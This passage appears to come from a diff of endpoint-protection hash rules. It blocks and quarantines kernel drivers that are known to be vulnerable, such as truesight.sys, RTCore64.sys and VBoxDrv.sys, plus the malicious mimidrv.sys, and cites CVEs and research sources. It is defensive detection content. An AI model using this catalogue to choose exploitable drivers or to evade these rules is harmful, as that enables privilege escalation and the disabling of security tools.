"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4b9295eef82a88012a2ae5a1987e3050a5b9a16862b7772c2f48bd2e36f7cff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "066e77b3-da67-5b0f-8311-335135a536fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816575Z", + "creation_date": "2026-03-23T11:45:31.816579Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816587Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "539bc7e214d332c57c6f15612866fcc28ea26a98b59e9ef61a5c1741ab221ae0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "067cf797-ab30-5ff8-94d0-01f304adb096", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971361Z", + "creation_date": "2026-03-23T11:45:29.971365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cb594af6a3655daebc9fad9c8abf2417b00ba31dcd118707824e5316fc0cc21", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "068025b9-3a38-50b5-9a3b-30c14ea6e256", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975931Z", + "creation_date": "2026-03-23T11:45:29.975934Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.975939Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0684151d-6de4-527e-adf7-c98ac1e3b1eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829433Z", + "creation_date": "2026-03-23T11:45:31.829435Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829441Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ad1486d7f98a6c3723196c246bf6997ccac65a46c2b0eb79ff638f594bb3193", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "068d19c5-1273-56a5-81df-8df7b3d9b6e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460437Z", + "creation_date": "2026-03-23T11:45:30.460440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460449Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7149fbd191d7e4941a32a3118ab017426b551d5d369f20c94c4f36ae4ef54f26", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "069b5c6f-9cdb-5e03-98cd-5b855cba23cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819289Z", + "creation_date": "2026-03-23T11:45:31.819293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d92522c737592f306d1361c32ff88470940dd28a81ff26ce464a65d5c6b0b80a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "069be0f5-50b9-564f-b101-2d441e5020eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814631Z", + "creation_date": "2026-03-23T11:45:31.814634Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814643Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0636235b2705c062810212da1f50ef48a53433ca1aa27ed04b65539d219769ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "069d944e-0a8c-56cc-872d-15d7966e0a0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150269Z", + "creation_date": "2026-03-23T11:45:31.150271Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150276Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b36081d2fbb90148de42923ba0fef9165e92505fe39971eea9bb544db0ce6de6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06b1e1b0-b95d-5ed5-ba98-c64b2146cf0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152010Z", + "creation_date": "2026-03-23T11:45:31.152013Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152021Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a5c065d6e28c1e2d58765df1753e0dbbd0d8270ee2eb777dfd33d76bf200b57", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06b39c46-093d-5e0f-aeaa-c7b862143f34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480151Z", + "creation_date": "2026-03-23T11:45:30.480153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5868cb3bf5d5a9237e29210218d3d93683c0e4894bc48685ac7d84a1e25e0462", + "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06b75643-0b71-58c6-a3d7-0dc1020a0b1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500814Z", + "creation_date": 
"2026-03-23T11:45:31.500817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500826Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "875de01289c469352f683580a0bf2d0cb46ccb242eb78424956679b18842270e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06d7bad1-e0f4-590f-be2c-1f6e6ce0269c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154229Z", + "creation_date": "2026-03-23T11:45:31.154231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db31d8cc945c9871612d19f2db3b16f81fbd19efc0e710b37057f6153b4fb2c5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "06da109a-4a6a-55fa-b81e-7187d7fbbe5a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816090Z", + "creation_date": "2026-03-23T11:45:31.816093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816101Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b439a7f4cac2b13180a145873d791e2b6f71b2e10ef7117436a1ceae17bb733", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06ddbcd6-e4c7-5d2f-9d12-0028d34a86ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828383Z", + "creation_date": "2026-03-23T11:45:30.828385Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828391Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58db1e62698a87fda67b49fca76baca5b5991685b22565fb83e26edef5827997", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06e48ac1-5837-5653-807c-b98c17b3be68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611184Z", + "creation_date": "2026-03-23T11:45:29.611186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611191Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0ed71b491aec860932fe92e5527ef444d537b396186ac839d5ed0884cfcaf0c", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06e5551b-cad2-5391-80ad-09213f824ab8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500682Z", + "creation_date": "2026-03-23T11:45:31.500685Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1327894d938cb090f79aff77edb58dab33244b4158f042852b9353f4ddec3697", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06ec01ee-9855-5b31-9063-8d347cdf93c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822998Z", + "creation_date": "2026-03-23T11:45:30.823000Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823005Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "45e5977b8d5baec776eb2e62a84981a8e46f6ce17947c9a76fa1f955dc547271", + "comment": "Vulnerable Kernel Driver (aka SysInfoDetectorX64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06f304f3-94d0-5ba8-a96b-9f91c7e15916", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828689Z", + "creation_date": "2026-03-23T11:45:31.828691Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828697Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43dce6bb47503971e9de906e464925e35e321fb409ad20d2dc27e45ddcfe6552", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0708b8a3-4bfe-5319-925f-0f7d1d2c45c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151229Z", + "creation_date": "2026-03-23T11:45:31.151231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a8989fd8122bea54c9912f1171658e29a7e4f4cd5d19f899d397a706deca8208", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0713656e-1889-5974-9456-84ca4212956f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608206Z", + "creation_date": "2026-03-23T11:45:29.608208Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608213Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7bd50bd6388e371414ed7d36238a60d30eaa7abf539fcf6d70617405f53a0133", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) 
[CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0719fb7b-da47-5076-84b9-b266312d34c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480144Z", + "creation_date": "2026-03-23T11:45:31.480148Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480156Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ba96a1e0c038852bef36e857e1cff58576f62e59d8248da0f133414f4f9451f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "07225064-f2e3-5a1c-a966-079de817f649", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974486Z", + 
"creation_date": "2026-03-23T11:45:29.974488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974494Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62d1ca62fb251b1eeda5d2577719414e6e26d4afdc5f3df3faf3b35de5cb9506", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0740f142-db65-5cd0-8ed3-229b2f429382", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146985Z", + "creation_date": "2026-03-23T11:45:32.146987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "011df46e94218cbb2f0b8da13ab3cec397246fdc63436e58b1bf597550a647f6", + "comment": "Vulnerable Kernel Driver (aka TPwSav.sys) [https://www.loldrivers.io/drivers/c0634ed7-840e-4a7e-8b34-33efe50405c2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0744783d-46d4-542e-8ba7-284a1e9397d1", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466748Z", + "creation_date": "2026-03-23T11:45:30.466752Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466761Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a5c08d40a5e73b9fe63ea5761eaec8f41d916ca3da2acbc4e6e799b06af5524", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 